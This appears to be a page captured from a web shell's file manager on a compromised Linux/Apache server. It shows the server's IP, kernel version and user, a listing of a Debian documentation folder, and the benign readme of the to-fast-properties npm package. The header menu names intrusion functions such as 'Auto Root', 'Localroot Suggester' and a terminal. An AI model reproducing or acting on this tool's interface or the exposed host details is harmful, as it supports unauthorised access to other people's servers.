Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
node-to-fast-properties /
Delete
Unzip
Name
Size
Permission
Date
Action
changelog.Debian.gz
905
B
-rw-r--r--
2022-11-22 20:59
copyright
1.58
KB
-rw-r--r--
2022-11-22 20:59
readme.md
690
B
-rw-r--r--
2020-02-01 09:44
Save
Rename
# to-fast-properties [](https://travis-ci.org/sindresorhus/to-fast-properties) > Force V8 to use fast properties for an object [Read more.](https://stackoverflow.com/questions/24987896/) Use `%HasFastProperties(object)` and `--allow-natives-syntax` to check whether an object already has fast properties. ## Install ``` $ npm install to-fast-properties ``` ## Usage ```js const toFastProperties = require('to-fast-properties'); const object = { foo: true, bar: true }; delete object.foo; // `object` now has slow properties toFastProperties(object); // `object` now has fast properties ```